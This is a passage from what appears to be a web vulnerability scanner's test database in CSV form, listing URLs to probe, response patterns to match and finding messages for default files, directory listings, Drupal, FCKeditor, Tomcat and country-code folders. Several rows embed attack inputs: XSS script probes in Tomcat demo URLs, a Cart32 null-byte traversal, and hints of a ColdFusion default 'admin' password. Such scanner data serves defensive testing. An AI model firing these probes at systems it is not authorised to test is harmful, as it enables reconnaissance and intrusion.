documentation.\",\"\",\"\"\n\"003534\",\"3233\",\"2\",\"/doc/Judy/JudyL_funcs_3x.htm\",\"GET\",\"Judy1 functions\",\"\",\"\",\"\",\"\",\"HP server Judy documentation.\",\"\",\"\"\n\"003535\",\"3233\",\"2\",\"/doc/Judy/JudySL_funcs_3x.htm\",\"GET\",\"JudySL functions\",\"\",\"\",\"\",\"\",\"HP server Judy documentation.\",\"\",\"\"\n\"003536\",\"3233\",\"2\",\"/doc/Judy/Judy_3x.htm\",\"GET\",\"Judy functions\",\"\",\"\",\"\",\"\",\"HP server Judy documentation.\",\"\",\"\"\n\"003537\",\"3233\",\"2\",\"/doc/Judy/JudySL_3x.htm\",\"GET\",\"JudySL macros\",\"\",\"\",\"\",\"\",\"HP server Judy documentation.\",\"\",\"\"\n\"003538\",\"3233\",\"2\",\"/doc/Judy/JudyL_3x.htm\",\"GET\",\"JudyL macros\",\"\",\"\",\"\",\"\",\"HP server Judy documentation.\",\"\",\"\"\n\"003539\",\"3233\",\"2\",\"/doc/Judy/LICENSE\",\"GET\",\"Software License\",\"\",\"200\",\"\",\"\",\"HP server Judy documentation.\",\"\",\"\"\n\"003540\",\"3233\",\"2\",\"/doc/Judy/demo/JudySort.c\",\"GET\",\"static char\",\"\",\"\",\"\",\"\",\"HP server Judy code.\",\"\",\"\"\n\"003541\",\"3233\",\"2\",\"/doc/Judy/demo/Makefile\",\"GET\",\"libJudy\\.a\",\"\",\"\",\"\",\"\",\"HP server Judy code.\",\"\",\"\"\n\"003542\",\"3233\",\"2\",\"/doc/Judy/demo/funhist.c\",\"GET\",\"FUNCTION HISTOGRAM\",\"\",\"\",\"\",\"\",\"HP server Judy code.\",\"\",\"\"\n\"003543\",\"3233\",\"2\",\"/doc/Judy/demo/interSL.c\",\"GET\",\"INTERACTIVE JUDYSL\",\"\",\"\",\"\",\"\",\"HP server Judy code.\",\"\",\"\"\n\"003544\",\"3233\",\"2\",\"/doc/icodUserGuide.pdf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Instant Capacity on Demand (iCOD) Userís Guide.\",\"\",\"\"\n\"003545\",\"3233\",\"2\",\"/doc/planning_SuperDome_configs.pdf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Planning HP SuperDome Configurations\",\"\",\"\"\n\"003546\",\"3233\",\"2\",\"/doc/vxvm/pitc_ag.pdf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"VERITAS FlashSnapTM Point-In-Time Copy Solutions documentation.\",\"\",\"\"\n\"003547\",\"3233\",\"2\",\"/doc/Judy/Judy_tech_book.pdf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"HP Judy documentation found.\",\"\",\"\"\n\"003548\",\"3233\",\"2\",\"/doc/vxvm/vxvm_ag.pdf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Veritas Volume Manager documentation.\",\"\",\"\"\n\"003549\",\"3233\",\"2\",\"/doc/vxvm/vxvm_hwnotes.pdf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Veritas Volume Manager documentation.\",\"\",\"\"\n\"003550\",\"3233\",\"2\",\"/doc/vxvm/vxvm_ig.pdf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Veritas Volume Manager documentation.\",\"\",\"\"\n\"003551\",\"3233\",\"2\",\"/doc/vxvm/vxvm_mig.pdf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Veritas Volume Manager documentation.\",\"\",\"\"\n\"003552\",\"3233\",\"2\",\"/doc/vxvm/vxvm_tshoot.pdf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Veritas Volume Manager documentation.\",\"\",\"\"\n\"003553\",\"3233\",\"2\",\"/doc/vxvm/vxvm_notes.pdf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Veritas Volume Manager documentation.\",\"\",\"\"\n\"003554\",\"3233\",\"2\",\"/doc/vxvm/vxvm_ug.pdf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Veritas Volume Manager documentation.\",\"\",\"\"\n\"003555\",\"3092\",\"1\",\"/staging/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"003556\",\"3092\",\"1\",\"/_archive/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Archive found.\",\"\",\"\"\n\"003557\",\"3268\",\"12\",\"/pdfs/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003558\",\"3093\",\"0\",\"@FCKEDITOReditor/filemanager/upload/test.html\",\"GET\",\"Custom Uploader\",\"\",\"200\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"003559\",\"3093\",\"0\",\"@FCKEDITOReditor/dialog/fck_image.html\",\"GET\",\"Short Description\",\"\",\"200\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"003560\",\"3093\",\"0\",\"@FCKEDITOReditor/filemanager/browser/default/connectors/test.html\",\"GET\",\"Connector\",\"\",\"200\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"003561\",\"3093\",\"0\",\"@FCKEDITOReditor/dialog/fck_flash.html\",\"GET\",\"Preview\",\"\",\"200\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"003562\",\"3093\",\"0\",\"@FCKEDITOReditor/dialog/fck_link.html\",\"GET\",\"Link Properties\",\"\",\"200\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"003563\",\"3093\",\"0\",\"@FCKEDITOReditor/filemanager/browser/default/connectors/asp/connector.asp\",\"GET\",\"text editor for\",\"\",\"\",\"\",\"\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"003564\",\"3268\",\"2\",\"/crm/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003565\",\"3268\",\"2\",\"/static/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003566\",\"3268\",\"2\",\"/w3c/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003567\",\"3268\",\"2\",\"/dynamic/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"003568\",\"3233\",\"b\",\"/update.php\",\"GET\",\"access_check\",\"\",\"\",\"\",\"\",\"Drupal's update.php was found.\",\"\",\"\"\n\"003569\",\"3092\",\"1\",\"/INSTALL.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default file found.\",\"\",\"\"\n\"003570\",\"3092\",\"1\",\"/UPGRADE.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Default file found.\",\"\",\"\"\n\"003571\",\"3092\",\"b\",\"/install.php\",\"GET\",\"Drupal already installed\",\"\",\"\",\"\",\"\",\"Drupal install.php file found.\",\"\",\"\"\n\"003572\",\"3092\",\"1\",\"/install.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"install.php file found.\",\"\",\"\"\n\"003573\",\"3092\",\"1b\",\"/LICENSE.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"License file found may identify site software.\",\"\",\"\"\n\"003574\",\"3092\",\"1b\",\"/upgrade.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"upgrade.php was found.\",\"\",\"\"\n\"003575\",\"3092\",\"1\",\"/xmlrpc.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"xmlrpc.php was found.\",\"\",\"\"\n\"003576\",\"3092\",\"1b\",\"/CHANGELOG.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"A changelog was found.\",\"\",\"\"\n\"003577\",\"3233\",\"b\",\"/INSTALL.mysql.txt\",\"GET\",\"CREATE THE\",\"\",\"\",\"\",\"\",\"Drupal installation file found.\",\"\",\"\"\n\"003578\",\"3233\",\"b\",\"/INSTALL.pgsql.txt\",\"GET\",\"CREATE THE\",\"\",\"\",\"\",\"\",\"Drupal installation file found.\",\"\",\"\"\n\"003579\",\"3233\",\"b\",\"/MAINTAINERS.txt\",\"GET\",\"CREATE THE\",\"\",\"\",\"\",\"\",\"Drupal maintainers file found.\",\"\",\"\"\n\"003580\",\"3093\",\"23b\",\"/sites/default/settings.php\",\"GET\",\"site-specific configuration\",\"\",\"\",\"\",\"\",\"The Drupal settings.php file is sent in plain text not parsed by PHP. This file may contain a database connection string.\",\"\",\"\"\n\"003581\",\"38580\",\"7\",\"@CGIDIRSc32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf \",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Cart32 contains a null byte directory traversal in the ImageName variable.\",\"\",\"\"\n\"003582\",\"3092\",\"3\",\"/sitemap.gz\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The sitemap.gz file, used for Google indexing, contains an xml representation of the web site's structure.\",\"\",\"\"\n\"003583\",\"3092\",\"3\",\"/content/sitemap.gz\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The sitemap.gz file, used for Google indexing, contains an xml representation of the web site\\'s structure.\",\"\",\"\"\n\"003584\",\"3233\",\"b\",\"/icons/README\",\"GET\",\"Public Domain Icons\",\"\",\"\",\"\",\"\",\"Apache default file found.\",\"\",\"\"\n\"003585\",\"3092\",\"b\",\"/localstart.asp\",\"GET\",\"<title>Welcome to Windows\",\"\",\"\",\"\",\"\",\"Default IIS install page found.\",\"\",\"\"\n\"003586\",\"0\",\"b\",\"/ampache/update.php\",\"GET\",\"Ampache Update\",\"\",\"\",\"\",\"\",\"Ampache update page is visible.\",\"\",\"\"\n\"003587\",\"0\",\"b\",\"/ampache/login.php\",\"GET\",\"Ampache :: Pour l\\&#039;Amour de la Musique\",\"\",\"\",\"\",\"\",\"Ampache is installed.\",\"\",\"\"\n\"003588\",\"0\",\"b\",\"/ampache/docs/README\",\"GET\",\"README - Ampache\",\"\",\"\",\"\",\"\",\"Ampache installation documents found.\",\"\",\"\"\n\"003589\",\"0\",\"b\",\"/cgi-bin/webcgi/about\",\"GET\",\"\\/cgi\\/locale\\/about_en\\.xsl\",\"\",\"\",\"\",\"\",\"Host seems to be a Dell Remote Access Controller (RAC).\",\"\",\"\"\n\"003590\",\"0\",\"bd\",\"/webservices/IlaWebServices\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Host has the Oracle iLearning environment installed.\",\"\",\"\"\n\"003591\",\"0\",\"a\",\"/SoundBridgeStatus.html\",\"GET\",\"200\",\"\",\"SoundBridge is running software version\",\"\",\"\",\"Host is running the SoundBridge web server which doesn't support identification.\",\"\",\"\"\n\"003592\",\"54339\",\"4b\",\"@CGIDIRSFormMail.pl\",\"GET\",\"Version 1\\.92\",\"\",\"\",\"\",\"\",\"Matt Wright's FormMail 1.92 is vulnerable to HTTP response splitting and Cross-Site Scripting\",\"\",\"\"\n\"006819\",\"0\",\"b\",\"/CFIDE/componentutils/cfcexplorer.cfc\",\"GET\",\"Component Browser Login\",\"\",\"\",\"\",\"\",\"ColdFusion Component Browser. Default password may be 'admin'.\",\"\",\"\"\n\"003593\",\"0\",\"1\",\"/phone/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"003594\",\"0\",\"b\",\"/Host/Portals/tabid/19/ctl/Login/portalid/0/Default.aspx\",\"GET\",\"txtUsername\",\"\",\"\",\"\",\"\",\"DotNetNuke is running on the web server.\",\"\",\"\"\n\"003595\",\"34879\",\"24\",\"/jsp-examples/jsp2/jspx/textRotate.jspx?name=<script>alert(111)</script>\",\"GET\",\"<script>alert\\(111\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The tomcat demo files are installed, which are vulnerable to an XSS attack\",\"\",\"\"\n\"003596\",\"34878\",\"24\",\"/jsp-examples/jsp2/el/implicit-objects.jsp?foo=<script>alert(112)</script>\",\"GET\",\"<script>alert\\(112\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The tomcat demo files are installed, which are vulnerable to an XSS attack\",\"\",\"\"\n\"003597\",\"12721\",\"24\",\"/jsp-examples/jsp2/el/functions.jsp?foo=<script>alert(113)</script>\",\"GET\",\"<script>alert\\(113\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The Tomcat demo files are installed, which are vulnerable to an XSS attack\",\"\",\"\"\n\"003598\",\"0\",\"b\",\"/aspnet_files/\",\"GET\",\"403\",\"\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\".NET client side script files indicate .NET may be running. See http://msdn.microsoft.com/en-us/library/aa479045.aspx#aspplusvalid_clientside\",\"\",\"\"\n\"003599\",\"3092\",\"1\",\"/Admin/\",\"GET\",\"200\",\"Directory Listing Denied\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"003600\",\"3092\",\"1\",\"/af/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Afghanistan)\",\"\",\"\"\n\"003601\",\"3092\",\"1\",\"/ax/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Aland Islands)\",\"\",\"\"\n\"003602\",\"3092\",\"1\",\"/al/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Albania)\",\"\",\"\"\n\"003603\",\"3092\",\"1\",\"/dz/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Algeria)\",\"\",\"\"\n\"003604\",\"3092\",\"1\",\"/as/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (American Samoa)\",\"\",\"\"\n\"003605\",\"3092\",\"1\",\"/ad/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Andorra)\",\"\",\"\"\n\"003606\",\"3092\",\"1\",\"/ao/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Angola)\",\"\",\"\"\n\"003607\",\"3092\",\"1\",\"/ai/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Anguilla)\",\"\",\"\"\n\"003608\",\"3092\",\"1\",\"/aq/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Antarctica)\",\"\",\"\"\n\"003609\",\"3092\",\"1\",\"/ag/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Antigua And Barbuda)\",\"\",\"\"\n\"003610\",\"3092\",\"1\",\"/ar/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Argentina)\",\"\",\"\"\n\"003611\",\"3092\",\"1\",\"/am/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Armenia)\",\"\",\"\"\n\"003612\",\"3092\",\"1\",\"/aw/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Aruba)\",\"\",\"\"\n\"003613\",\"3092\",\"1\",\"/au/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Australia)\",\"\",\"\"\n\"003614\",\"3092\",\"1\",\"/at/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Austria)\",\"\",\"\"\n\"003615\",\"3092\",\"1\",\"/az/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Azerbaijan)\",\"\",\"\"\n\"003616\",\"3092\",\"1\",\"/bs/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Bahamas)\",\"\",\"\"\n\"003617\",\"3092\",\"1\",\"/bh/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Bahrain)\",\"\",\"\"\n\"003618\",\"3092\",\"1\",\"/bd/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Bangladesh)\",\"\",\"\"\n\"003619\",\"3092\",\"1\",\"/bb/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Barbados)\",\"\",\"\"\n\"003620\",\"3092\",\"1\",\"/by/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Belarus)\",\"\",\"\"\n\"003621\",\"3092\",\"1\",\"/be/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Belgium)\",\"\",\"\"\n\"003622\",\"3092\",\"1\",\"/bz/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Belize)\",\"\",\"\"\n\"003623\",\"3092\",\"1\",\"/bj/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Benin)\",\"\",\"\"\n\"003624\",\"3092\",\"1\",\"/bm/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Bermuda)\",\"\",\"\"\n\"003625\",\"3092\",\"1\",\"/bt/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Bhutan)\",\"\",\"\"\n\"003626\",\"3092\",\"1\",\"/bo/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Bolivia)\",\"\",\"\"\n\"003627\",\"3092\",\"1\",\"/ba/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Bosnia And Herzegovina)\",\"\",\"\"\n\"003628\",\"3092\",\"1\",\"/bw/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Botswana)\",\"\",\"\"\n\"003629\",\"3092\",\"1\",\"/bv/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Bouvet Island)\",\"\",\"\"\n\"003630\",\"3092\",\"1\",\"/br/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Brazil)\",\"\",\"\"\n\"003631\",\"3092\",\"1\",\"/io/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (British Indian Ocean Territory)\",\"\",\"\"\n\"003632\",\"3092\",\"1\",\"/bn/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Brunei Darussalam)\",\"\",\"\"\n\"003633\",\"3092\",\"1\",\"/bg/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Bulgaria)\",\"\",\"\"\n\"003634\",\"3092\",\"1\",\"/bf/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Burkina Faso)\",\"\",\"\"\n\"003635\",\"3092\",\"1\",\"/bi/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Burundi)\",\"\",\"\"\n\"003636\",\"3092\",\"1\",\"/kh/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Cambodia)\",\"\",\"\"\n\"003637\",\"3092\",\"1\",\"/cm/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Cameroon)\",\"\",\"\"\n\"003638\",\"3092\",\"1\",\"/ca/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Canada)\",\"\",\"\"\n\"003639\",\"3092\",\"1\",\"/cv/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Cape Verde)\",\"\",\"\"\n\"003640\",\"3092\",\"1\",\"/ky/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Cayman Islands)\",\"\",\"\"\n\"003641\",\"3092\",\"1\",\"/cf/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Central African Republic)\",\"\",\"\"\n\"003642\",\"3092\",\"1\",\"/td/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Chad)\",\"\",\"\"\n\"003643\",\"3092\",\"1\",\"/cl/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Chile)\",\"\",\"\"\n\"003644\",\"3092\",\"1\",\"/cn/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (China)\",\"\",\"\"\n\"003645\",\"3092\",\"1\",\"/cx/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Christmas Island)\",\"\",\"\"\n\"003646\",\"3092\",\"1\",\"/cc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Cocos (keeling) Islands)\",\"\",\"\"\n\"003647\",\"3092\",\"1\",\"/co/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Colombia)\",\"\",\"\"\n\"003648\",\"3092\",\"1\",\"/km/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Comoros)\",\"\",\"\"\n\"003649\",\"3092\",\"1\",\"/cg/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Congo)\",\"\",\"\"\n\"003650\",\"3092\",\"1\",\"/cd/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (The Democratic Republic Of The Congo)\",\"\",\"\"\n\"003651\",\"3092\",\"1\",\"/ck/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Cook Islands)\",\"\",\"\"\n\"003652\",\"3092\",\"1\",\"/cr/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Costa Rica)\",\"\",\"\"\n\"003653\",\"3092\",\"1\",\"/ci/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (CÔte D'ivoire)\",\"\",\"\"\n\"003654\",\"3092\",\"1\",\"/hr/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Croatia)\",\"\",\"\"\n\"003655\",\"3092\",\"1\",\"/cu/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Cuba)\",\"\",\"\"\n\"003656\",\"3092\",\"1\",\"/cy/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Cyprus)\",\"\",\"\"\n\"003657\",\"3092\",\"1\",\"/cz/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Czech Republic)\",\"\",\"\"\n\"003658\",\"3092\",\"1\",\"/dk/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Denmark)\",\"\",\"\"\n\"003659\",\"3092\",\"1\",\"/dj/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Djibouti)\",\"\",\"\"\n\"003660\",\"3092\",\"1\",\"/dm/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Dominica)\",\"\",\"\"\n\"003661\",\"3092\",\"1\",\"/do/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Dominican Republic)\",\"\",\"\"\n\"003662\",\"3092\",\"1\",\"/ec/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Ecuador)\",\"\",\"\"\n\"003663\",\"3092\",\"1\",\"/eg/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Egypt)\",\"\",\"\"\n\"003664\",\"3092\",\"1\",\"/sv/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (El Salvador)\",\"\",\"\"\n\"003665\",\"3092\",\"1\",\"/gq/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Equatorial Guinea)\",\"\",\"\"\n\"003666\",\"3092\",\"1\",\"/er/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Eritrea)\",\"\",\"\"\n\"003667\",\"3092\",\"1\",\"/ee/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Estonia)\",\"\",\"\"\n\"003668\",\"3092\",\"1\",\"/et/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Ethiopia)\",\"\",\"\"\n\"003669\",\"3092\",\"1\",\"/fk/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Falkland Islands (malvinas))\",\"\",\"\"\n\"003670\",\"3092\",\"1\",\"/fo/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Faroe Islands)\",\"\",\"\"\n\"003671\",\"3092\",\"1\",\"/fj/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Fiji)\",\"\",\"\"\n\"003672\",\"3092\",\"1\",\"/fi/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Finland)\",\"\",\"\"\n\"003673\",\"3092\",\"1\",\"/fr/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (France)\",\"\",\"\"\n\"003674\",\"3092\",\"1\",\"/gf/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (French Guiana)\",\"\",\"\"\n\"003675\",\"3092\",\"1\",\"/pf/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (French Polynesia)\",\"\",\"\"\n\"003676\",\"3092\",\"1\",\"/tf/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (French Southern Territories)\",\"\",\"\"\n\"003677\",\"3092\",\"1\",\"/ga/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Gabon)\",\"\",\"\"\n\"003678\",\"3092\",\"1\",\"/gm/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Gambia)\",\"\",\"\"\n\"003679\",\"3092\",\"1\",\"/ge/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Georgia)\",\"\",\"\"\n\"003680\",\"3092\",\"1\",\"/de/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Germany)\",\"\",\"\"\n\"003681\",\"3092\",\"1\",\"/gh/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Ghana)\",\"\",\"\"\n\"003682\",\"3092\",\"1\",\"/gi/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Gibraltar)\",\"\",\"\"\n\"003683\",\"3092\",\"1\",\"/gr/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Greece)\",\"\",\"\"\n\"003684\",\"3092\",\"1\",\"/gl/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Greenland)\",\"\",\"\"\n\"003685\",\"3092\",\"1\",\"/gd/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Grenada)\",\"\",\"\"\n\"003686\",\"3092\",\"1\",\"/gp/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Guadeloupe)\",\"\",\"\"\n\"003687\",\"3092\",\"1\",\"/gu/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Guam)\",\"\",\"\"\n\"003688\",\"3092\",\"1\",\"/gt/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Guatemala)\",\"\",\"\"\n\"003689\",\"3092\",\"1\",\"/gg/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Guernsey)\",\"\",\"\"\n\"003690\",\"3092\",\"1\",\"/gn/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Guinea)\",\"\",\"\"\n\"003691\",\"3092\",\"1\",\"/gw/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Guinea-bissau)\",\"\",\"\"\n\"003692\",\"3092\",\"1\",\"/gy/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Guyana)\",\"\",\"\"\n\"003693\",\"3092\",\"1\",\"/ht/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Haiti)\",\"\",\"\"\n\"003694\",\"3092\",\"1\",\"/hm/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Heard Island And Mcdonald Islands)\",\"\",\"\"\n\"003695\",\"3092\",\"1\",\"/va/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Holy See (vatican City State))\",\"\",\"\"\n\"003696\",\"3092\",\"1\",\"/hn/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Honduras)\",\"\",\"\"\n\"003697\",\"3092\",\"1\",\"/hk/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Hong 